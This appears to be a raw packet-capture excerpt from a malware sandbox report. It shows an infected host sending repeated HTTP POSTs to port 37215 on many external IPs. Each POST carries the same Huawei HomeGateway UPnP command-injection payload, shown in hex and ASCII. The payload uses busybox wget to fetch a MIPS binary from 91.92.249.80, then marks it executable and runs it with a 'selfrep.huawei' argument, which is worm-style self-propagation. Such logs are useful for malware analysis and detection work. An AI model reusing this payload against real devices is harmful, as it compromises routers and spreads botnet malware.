                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1476192.168.2.2341254173.57.68.11837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474735022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1477192.168.2.236046041.155.38.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474742889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1478192.168.2.234467441.174.115.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474757910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1479192.168.2.233366841.162.136.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474765062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1480192.168.2.235727472.151.46.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474931955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1481192.168.2.2355254157.87.10.14337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475379944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1482192.168.2.2352042157.179.18.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475442886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1483192.168.2.233618841.40.226.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475452900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1484192.168.2.234088241.245.70.10437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475545883 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1485192.168.2.2356482110.176.191.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475580931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
